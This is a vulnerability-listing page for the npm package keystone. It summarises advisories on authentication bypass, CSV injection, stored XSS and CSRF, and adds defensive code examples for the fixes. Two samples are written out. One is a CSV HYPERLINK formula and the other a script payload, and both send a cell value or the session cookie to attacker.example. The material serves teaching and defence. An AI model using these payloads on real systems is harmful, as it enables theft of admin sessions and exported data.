NodeJS/keystone/0.0.34
Web Application Framework and Admin GUI / Content Management System built on Express.js and Mongoose
https://www.npmjs.com/package/keystone
MIT
8 Security Vulnerabilities
Authentication Weakness in keystone
Versions of keystone prior to 0.3.16 are affected by a partial authentication bypass vulnerability. In the default sign in functionality, if an attacker provides a full and correct password, yet only provides part of the associated email address, authentication will be granted.
Recommendation
Update to version 0.3.16 or later.
Keystone is vulnerable to CSV injection
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
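The CSV injection fix, as an added example that is not Keystone's own code (the export paths named above are not reproduced here): a CSV writer that defangs any field starting with a formula trigger character (`=`, `+`, `-`, `@`, tab, carriage return) by prefixing a single quote and quoting the field, so a spreadsheet renders it as text instead of evaluating it. The enquiry rows are constructed sample data.

```javascript
// Added example, not code from the keystone project. Shows output-side
// neutralisation of formula injection in a CSV export.

// Characters that make Excel / LibreOffice interpret a cell as a formula.
const FORMULA_TRIGGERS = /^[=+\-@\t\r]/;

// Encode one CSV field: defang formula triggers, then apply RFC 4180 quoting.
function csvField(value) {
  let s = value == null ? '' : String(value);
  let risky = false;
  if (FORMULA_TRIGGERS.test(s)) {
    s = "'" + s;          // leading apostrophe forces text interpretation
    risky = true;
  }
  if (risky || /[",\r\n]/.test(s)) {
    s = '"' + s.replace(/"/g, '""') + '"';
  }
  return s;
}

// Serialise rows (array of objects) using the given column order.
function toCsv(rows, columns) {
  const header = columns.map(csvField).join(',');
  const body = rows.map((row) => columns.map((c) => csvField(row[c])).join(','));
  return [header, ...body].join('\r\n') + '\r\n';
}

// Constructed sample: two contact-form enquiries, one carrying a HYPERLINK
// formula that would leak the neighbouring cell to an attacker-controlled host.
const sampleRows = [
  { name: 'Alice', email: 'alice@example.com', message: 'Hello' },
  {
    name: '=HYPERLINK("https://attacker.example/?"&A1,"click")',
    email: 'mallory@example.com',
    message: '-1, see attached',
  },
];

const sampleCsv = toCsv(sampleRows, ['name', 'email', 'message']);
```

The trade-off is that legitimate values such as negative numbers (`-1`) are also prefixed; exports of numeric columns should apply the rule only to free-text fields that users control.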
Cross-Site Scripting in keystone
- https://nvd.nist.gov/vuln/detail/CVE-2017-15881
- https://github.com/advisories/GHSA-7cv6-gvx3-m54m
- https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
- https://www.npmjs.com/advisories/981
- https://github.com/keystonejs/keystone/issues/4437
- https://github.com/keystonejs/keystone/pull/4478
- http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/
- http://www.securityfocus.com/bid/101541
Versions of keystone prior to 4.0.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly encode rendered HTML on admin-created blog posts. This allows attackers to execute arbitrary JavaScript in the victim's browser. Exploiting this vulnerability requires having access to an admin account.
Recommendation
Update to version 4.0.0 or later.
Cross-Site Scripting in keystone
- https://nvd.nist.gov/vuln/detail/CVE-2017-15878
- https://github.com/advisories/GHSA-7qcx-jmrc-h2rr
- https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
- https://www.npmjs.com/advisories/980
- https://github.com/keystonejs/keystone/pull/4478
- https://packetstormsecurity.com/files/144756/KeystoneJS-4.0.0-beta.5-Unauthenticated-Stored-Cross-Site-Scripting.html
- https://www.exploit-db.com/exploits/43054/
- http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/
- http://www.securityfocus.com/bid/101541
Versions of keystone prior to 4.0.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize user input on the Contact Us page, allowing attackers to submit contact forms with malicious JavaScript in the message field. The output is not properly encoded, so an admin who opens the new inquiry executes the attacker-supplied JavaScript in their browser.
Recommendation
Update to version 4.0.0 or later.
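Both XSS advisories above (the admin-created blog post, CVE-2017-15881, and the anonymous Contact Us message, CVE-2017-15878) share the same root cause: an untrusted value is placed into HTML without encoding. The following is an added example, not Keystone's code or the fix in PR 4478, showing the raw rendering next to an output-encoded version for a contact enquiry; the enquiry record and the render functions are assumptions for the demo.

```javascript
// Added example, not code from the keystone project. Contrasts an unencoded
// template with one that HTML-encodes every untrusted field at output time.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for the HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value == null ? '' : value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable rendering: raw interpolation, equivalent to an unescaped template tag.
function renderEnquiryVulnerable(enquiry) {
  return `<div class="enquiry"><h2>${enquiry.name}</h2><p>${enquiry.message}</p></div>`;
}

// Hardened rendering: the markup is fixed, the data is encoded.
function renderEnquiry(enquiry) {
  return `<div class="enquiry"><h2>${escapeHtml(enquiry.name)}</h2><p>${escapeHtml(enquiry.message)}</p></div>`;
}

// Constructed sample: a message an anonymous visitor could submit through the
// contact form, aimed at whichever admin opens the enquiry.
const sampleEnquiry = {
  name: 'Mallory',
  message: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
};
```

Encoding at output is the right fix for plain-text fields such as a contact message. Admin-authored blog posts that legitimately contain HTML need an allowlist sanitizer (tags and attributes permitted, event handlers and script URLs removed) rather than whole-value encoding, which would strip the formatting; either way the decision is made where the value is rendered, not where it is stored.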
Authentication Weakness in keystone
There is an authentication weakness vulnerability in keystone before version 0.3.16. Due to a bug in the default sign in functionality, incomplete email addresses could be matched. A correct password is still required to complete sign in.
Cross-Site Scripting in keystone
Withdrawn: Duplicate of GHSA-7qcx-jmrc-h2rr
Cross-Site Request Forgery (CSRF) in keystone
- https://nvd.nist.gov/vuln/detail/CVE-2017-16570
- https://github.com/advisories/GHSA-q43c-g2g7-6gxj
- https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
- https://snyk.io/vuln/SNYK-JS-KEYSTONE-449663
- https://www.npmjs.com/advisories/979
- https://github.com/keystonejs/keystone/issues/4437
- https://github.com/keystonejs/keystone/pull/4478
- https://www.exploit-db.com/exploits/43922/
- http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/
Versions of keystone prior to 4.0.0 are vulnerable to Cross-Site Request Forgery (CSRF). The package fails to validate the presence of the X-CSRF-Token header, which may allow attackers to carry out actions on behalf of other users on all endpoints.
Recommendation
Update to version 4.0.0 or later.
Authentication Weakness
Due to a bug in the default sign in functionality, incomplete email addresses could be matched. A correct password is still required to complete sign in.
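The three "Authentication Weakness" entries on this page describe the same pre-0.3.16 bug: a sign-in lookup that matches a prefix of the stored email address. The following is an added example, not Keystone's code, reconstructing that behaviour as an unanchored, case-insensitive regex lookup beside a hardened lookup that compares the whole normalised address. The in-memory user list stands in for the database query, and the plaintext password field is a demo simplification (a real application compares a password hash).

```javascript
// Added example, not code from the keystone project. Demonstrates why a
// prefix-matching email lookup lets a correct password plus a partial email
// sign in, and how an exact comparison closes it.

// Constructed sample users; passwords are plaintext only for this demo.
const users = [
  { email: 'alice@example.com', password: 'correct horse' },
  { email: 'alicia@example.com', password: 'battery staple' },
];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Vulnerable lookup: the pattern is anchored only at the start, so "alice",
// "ali" or "a" all select a real user's record.
function findUserVulnerable(emailInput) {
  const pattern = new RegExp('^' + escapeRegExp(String(emailInput)), 'i');
  return users.find((u) => pattern.test(u.email)) || null;
}

// Hardened lookup: no regex at all; canonicalise and compare the full address.
function findUserFixed(emailInput) {
  const wanted = String(emailInput).trim().toLowerCase();
  return users.find((u) => u.email.toLowerCase() === wanted) || null;
}

// Sign-in flow shared by both lookups; the password check is unchanged by the bug.
function signIn(findUser, emailInput, passwordInput) {
  const user = findUser(emailInput);
  if (!user) return { ok: false, reason: 'no such user' };
  if (user.password !== passwordInput) return { ok: false, reason: 'bad password' };
  return { ok: true, email: user.email };
}
```

Case-insensitive matching is a legitimate requirement for email addresses, but it is better met by storing a lower-cased copy of the address and querying it exactly than by building a regex from user input; where a regex is unavoidable it must be escaped and anchored at both ends (`^...$`).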
171 Other Versions
Version | License | Security (advisories) | Released | Age |
---|---|---|---|---|
4.2.1 | MIT | | 2019-07-15 - 12:56 | almost 5 years |
4.2.0 | MIT | | 2019-07-15 - 12:49 | almost 5 years |
4.1.1 | MIT | | 2019-06-23 - 12:57 | about 5 years |
4.1.0 | MIT | | 2019-05-19 - 15:54 | about 5 years |
4.0.0 | MIT | | 2018-07-25 - 08:31 | almost 6 years |
4.0.0-rc.1 | MIT | 2 | 2018-07-06 - 07:57 | almost 6 years |
4.0.0-rc.0 | MIT | 2 | 2018-06-22 - 09:31 | about 6 years |
4.0.0-beta.8 | MIT | 2 | 2018-01-22 - 13:00 | over 6 years |
4.0.0-beta.7 | MIT | 2 | 2017-10-23 - 06:45 | over 6 years |
4.0.0-beta.5 | MIT | 5 | 2017-01-25 - 06:08 | over 7 years |
4.0.0-beta.4 | MIT | 5 | 2016-12-02 - 02:11 | over 7 years |
4.0.0-beta.3 | MIT | 5 | 2016-09-25 - 10:56 | almost 8 years |
4.0.0-beta.2 | MIT | 5 | 2016-09-06 - 02:25 | almost 8 years |
4.0.0-beta.1 | MIT | 5 | 2016-08-25 - 07:54 | almost 8 years |
0.3.22 | MIT | 5 | 2016-07-22 - 10:36 | almost 8 years |
0.3.21 | MIT | 5 | 2016-06-19 - 11:44 | about 8 years |
0.3.20 | MIT | 5 | 2016-06-17 - 11:45 | about 8 years |
0.3.19 | MIT | 5 | 2016-05-04 - 15:09 | about 8 years |
0.3.18 | MIT | 5 | 2016-04-27 - 06:59 | about 8 years |
0.3.17 | MIT | 5 | 2016-03-23 - 09:04 | over 8 years |
0.3.16 | MIT | 5 | 2015-12-04 - 02:49 | over 8 years |
0.3.15 | MIT | 8 | 2015-10-15 - 00:28 | over 8 years |
0.3.14 | MIT | 8 | 2015-08-25 - 04:48 | almost 9 years |
0.3.13 | MIT | 8 | 2015-08-03 - 11:36 | almost 9 years |
0.3.12 | MIT | 8 | 2015-06-25 - 14:16 | about 9 years |
0.3.11 | MIT | 8 | 2015-06-12 - 06:16 | about 9 years |
0.3.10 | MIT | 8 | 2015-05-19 - 13:55 | about 9 years |
0.3.9 | MIT | 8 | 2015-05-16 - 14:25 | about 9 years |
0.3.8 | MIT | 8 | 2015-04-23 - 13:36 | about 9 years |
0.3.7 | MIT | 8 | 2015-04-23 - 09:44 | about 9 years |
0.3.6 | MIT | 8 | 2015-04-14 - 00:18 | about 9 years |
0.3.5 | MIT | 8 | 2015-04-12 - 10:52 | about 9 years |
0.3.4 | MIT | 8 | 2015-03-10 - 12:07 | over 9 years |
0.3.3 | MIT | 8 | 2015-03-08 - 12:17 | over 9 years |
0.3.2 | MIT | 8 | 2015-02-27 - 11:22 | over 9 years |
0.3.1 | MIT | 8 | 2015-02-13 - 11:37 | over 9 years |
0.3.0 | MIT | 8 | 2015-02-10 - 10:49 | over 9 years |
0.2.42 | MIT | 8 | 2015-01-20 - 03:47 | over 9 years |
0.2.41 | MIT | 8 | 2015-01-18 - 11:48 | over 9 years |
0.2.40 | MIT | 8 | 2014-12-31 - 04:26 | over 9 years |
0.2.39 | MIT | 8 | 2014-12-20 - 07:57 | over 9 years |
0.2.38 | MIT | 8 | 2014-12-19 - 07:52 | over 9 years |
0.2.37 | MIT | 8 | 2014-12-19 - 00:54 | over 9 years |
0.2.36 | MIT | 8 | 2014-12-07 - 04:51 | over 9 years |
0.2.35 | MIT | 8 | 2014-12-03 - 07:00 | over 9 years |
0.2.34 | MIT | 8 | 2014-11-29 - 10:14 | over 9 years |
0.2.33 | MIT | 8 | 2014-11-04 - 14:36 | over 9 years |
0.2.32 | MIT | 8 | 2014-10-16 - 11:08 | over 9 years |
0.2.31 | MIT | 8 | 2014-10-14 - 12:50 | over 9 years |
0.2.30 | MIT | 8 | 2014-10-02 - 12:17 | over 9 years |
0.2.29 | MIT | 8 | 2014-09-30 - 13:54 | almost 10 years |
0.2.28 | MIT | 8 | 2014-09-12 - 11:42 | almost 10 years |
0.2.27 | MIT | 8 | 2014-08-30 - 11:43 | almost 10 years |
0.2.26 | MIT | 8 | 2014-08-14 - 04:03 | almost 10 years |
0.2.25 | MIT | 8 | 2014-07-27 - 13:09 | almost 10 years |
0.2.24 | MIT | 8 | 2014-07-25 - 07:10 | almost 10 years |
0.2.23 | MIT | 8 | 2014-07-20 - 11:06 | almost 10 years |
0.2.22 | MIT | 8 | 2014-06-28 - 17:17 | about 10 years |
0.2.21 | MIT | 8 | 2014-06-16 - 03:57 | about 10 years |
0.2.20 | MIT | 8 | 2014-06-06 - 11:00 | about 10 years |
0.2.19 | MIT | 8 | 2014-05-28 - 08:19 | about 10 years |
0.2.18 | MIT | 8 | 2014-05-21 - 15:05 | about 10 years |
0.2.17 | MIT | 8 | 2014-05-19 - 02:19 | about 10 years |
0.2.16 | MIT | 8 | 2014-05-14 - 11:20 | about 10 years |
0.2.15 | MIT | 8 | 2014-05-13 - 06:13 | about 10 years |
0.2.14 | MIT | 8 | 2014-04-15 - 16:40 | about 10 years |
0.2.13 | MIT | 8 | 2014-04-03 - 14:31 | about 10 years |
0.2.12 | MIT | 8 | 2014-04-02 - 15:25 | over 10 years |
0.2.11 | MIT | 8 | 2014-04-02 - 11:30 | over 10 years |
0.2.10 | MIT | 8 | 2014-03-18 - 15:46 | over 10 years |
0.2.9 | MIT | 8 | 2014-03-18 - 12:42 | over 10 years |
0.2.8 | MIT | 8 | 2014-03-12 - 16:05 | over 10 years |
0.2.7 | MIT | 8 | 2014-03-11 - 08:31 | over 10 years |
0.2.6 | MIT | 8 | 2014-02-25 - 06:08 | over 10 years |
0.2.5 | MIT | 8 | 2014-02-17 - 15:56 | over 10 years |
0.2.4 | MIT | 8 | 2014-02-15 - 16:35 | over 10 years |
0.2.3 | MIT | 8 | 2014-02-10 - 15:10 | over 10 years |
0.2.2 | MIT | 8 | 2014-02-05 - 09:48 | over 10 years |
0.2.1 | MIT | 8 | 2014-02-04 - 06:16 | over 10 years |
0.2.0 | MIT | 8 | 2014-01-25 - 16:18 | over 10 years |
0.1.55 | MIT | 8 | 2013-12-30 - 03:45 | over 10 years |
0.1.54 | MIT | 8 | 2013-12-23 - 08:50 | over 10 years |
0.1.53 | MIT | 8 | 2013-12-22 - 14:29 | over 10 years |
0.1.52 | MIT | 8 | 2013-12-12 - 08:29 | over 10 years |
0.1.51 | MIT | 8 | 2013-12-10 - 17:08 | over 10 years |
0.1.50 | MIT | 8 | 2013-12-09 - 07:24 | over 10 years |
0.1.49 | MIT | 8 | 2013-12-04 - 06:52 | over 10 years |
0.1.48 | MIT | 8 | 2013-12-03 - 06:21 | over 10 years |
0.1.47 | MIT | 8 | 2013-12-02 - 06:55 | over 10 years |
0.1.46 | MIT | 8 | 2013-11-27 - 08:38 | over 10 years |
0.1.45 | MIT | 8 | 2013-11-20 - 14:51 | over 10 years |
0.1.44 | MIT | 8 | 2013-11-19 - 15:50 | over 10 years |
0.1.43 | MIT | 8 | 2013-11-19 - 14:27 | over 10 years |
0.1.42 | MIT | 8 | 2013-11-18 - 15:49 | over 10 years |
0.1.41 | MIT | 8 | 2013-11-18 - 10:56 | over 10 years |
0.1.40 | MIT | 8 | 2013-11-14 - 09:00 | over 10 years |
0.1.39 | MIT | 8 | 2013-11-06 - 13:45 | over 10 years |
0.1.38 | MIT | 8 | 2013-11-05 - 15:44 | over 10 years |
0.1.37 | MIT | 8 | 2013-11-04 - 06:59 | over 10 years |
0.1.36 | MIT | 8 | 2013-11-02 - 14:57 | over 10 years |